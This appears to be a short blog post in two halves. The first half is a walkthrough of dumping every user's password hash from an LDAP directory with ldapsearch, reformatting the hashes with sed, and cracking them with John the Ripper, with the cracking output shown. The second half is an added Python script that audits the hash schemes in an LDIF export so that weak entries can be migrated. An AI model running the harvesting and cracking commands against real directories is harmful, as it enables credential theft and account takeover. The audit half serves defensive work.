Monday, February 1, 2016

dear john


ldapsearch -x -D "cn=bindAcct,dc=domain" -w bindpass -h 6.6.6.6 -b ou=users,dc=domain -LLL "(objectClass=shadowAccount)" userPassword > dearjohn   # query
sed -i '/^$/d' dearjohn                            # remove blank lines
sed -i 's/,ou=users,dc=domain//g' dearjohn         # strip the domain from the user dn
sed -i 's/dn:\ uid=//g' dearjohn                   # strip the "dn: uid=" prefix, leaving the uid
sed -i ':a;N;$!ba;s/\n/blast/g' dearjohn           # have fun with line breaks: join everything onto one line
sed -i 's/userPassword//g' dearjohn                # strip out the attribute name
sed -i 's/blast::\ /:/g' dearjohn                  # format fun: uid:hash
sed -i 's/blast/\n/g' dearjohn                     # bring the line breaks back
john dearjohn

Warning: only loading hashes of type "des", but also saw type "md5"
Use the "--format=md5" option to force loading hashes of that type instead
Loaded 26 password hashes with 26 different salts (Traditional DES [128/128 BS SSE2-16])
Remaining 25 password hashes with 25 different salts

...
...
...
and now you know how to connect to an ldap server, snarf all the user password hashes, format them for john the ripper with sed, and then go about cracking them. the fun.
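The john output above is also the directory administrator's finding: the server is storing traditional DES crypt and md5 hashes, which john loads and cracks directly. The audit a defender would run over the same export is below. It is an added example, not code from the post: it parses LDIF as ldapsearch emits it (including `attr:: base64` values per RFC 2849 and folded continuation lines), pulls the uid out of the dn form used on this page (`uid=...,ou=users,dc=domain`), and rates each stored userPassword scheme so that cleartext, unsalted and DES-crypt entries can be migrated before anyone else finds them. The sample LDIF and every hash value in it are constructed.

```python
"""Audit the password-hash schemes stored in an LDIF export of userPassword.

Added example, not the post author's code. Sample entries and hash values are
constructed; the dn layout (uid=...,ou=users,dc=domain) follows the post.
"""
import base64
import re
from collections import Counter

# Scheme name -> rating. Anything not listed is reported as "unknown".
RATINGS = {
    "cleartext": "critical",   # no scheme tag: the directory stores the value verbatim
    "crypt-des": "weak",       # 13-char traditional DES crypt, 8-character password limit
    "md5": "weak",             # unsalted digest
    "sha": "weak",             # unsalted digest
    "smd5": "moderate",        # salted but a single fast digest
    "ssha": "moderate",
    "md5crypt": "moderate",    # $1$: salted, 1000 iterations of MD5
    "sha256crypt": "ok",
    "sha512crypt": "ok",
    "bcrypt": "ok",
    "pbkdf2": "ok",
    "argon2": "ok",
}


def parse_ldif(text):
    """Return [(dn, {attr: [values]})]; decodes 'attr:: base64' and joins folded lines."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:      # RFC 2849 folded continuation line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, attrs, dn = [], {}, None
    for line in lines + [""]:                  # trailing "" flushes the last entry
        if line == "":
            if dn is not None:
                entries.append((dn, attrs))
            dn, attrs = None, {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):              # 'attr:: <base64>'
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if attr == "dn":
            dn = value
        else:
            attrs.setdefault(attr, []).append(value)
    return entries


def classify(stored):
    """Map one userPassword value to a scheme name from RATINGS (or 'unknown')."""
    m = re.match(r"\{([A-Za-z0-9_-]+)\}(.*)", stored, re.S)
    if not m:
        return "cleartext"
    scheme, rest = m.group(1).upper(), m.group(2)
    if scheme == "CRYPT":                      # crypt(3) string: dispatch on its prefix
        if rest.startswith("$1$"):
            return "md5crypt"
        if rest.startswith("$5$"):
            return "sha256crypt"
        if rest.startswith("$6$"):
            return "sha512crypt"
        if rest.startswith("$2"):
            return "bcrypt"
        return "crypt-des" if len(rest) == 13 else "unknown"
    if scheme.startswith("PBKDF2"):
        return "pbkdf2"
    if scheme.startswith("ARGON2"):
        return "argon2"
    return scheme.lower() if scheme.lower() in RATINGS else "unknown"


def audit(text):
    """Return {uid: (scheme, rating)} for every entry that carries a userPassword."""
    result = {}
    for dn, attrs in parse_ldif(text):
        m = re.search(r"(?:^|,)uid=([^,]+)", dn)
        uid = m.group(1) if m else dn
        for stored in attrs.get("userPassword", []):
            scheme = classify(stored)
            result[uid] = (scheme, RATINGS.get(scheme, "unknown"))
    return result


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample in the shape of `ldapsearch -LLL ... userPassword` output.
SAMPLE_LDIF = "\n".join([
    "dn: uid=alice,ou=users,dc=domain",
    "userPassword:: " + _b64("{SSHA}" + "A" * 28),
    "",
    "dn: uid=bob,ou=users,dc=domain",
    "userPassword:: " + _b64("{CRYPT}ab" + "x" * 11),   # 13-char DES crypt
    "",
    "dn: uid=carol,ou=users,dc=domain",
    "userPassword: {CRYPT}$1$saltsalt$" + "y" * 22,
    "",
    "dn: uid=dave,ou=users,dc=domain",
    "userPassword: {MD5}" + "Q" * 22 + "==",
    "",
    "dn: uid=erin,ou=users,dc=domain",
    "userPassword:: " + _b64("hunter2"),                # no scheme tag: cleartext
    "",
])

if __name__ == "__main__":
    findings = audit(SAMPLE_LDIF)
    for uid, (scheme, rating) in sorted(findings.items()):
        print(f"{uid:10s} {scheme:12s} {rating}")
    print(Counter(rating for _, rating in findings.values()))
```

Run it against a real export by replacing `SAMPLE_LDIF` with the file contents; anything rated critical or weak is what john loads first, so those accounts are the migration list.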
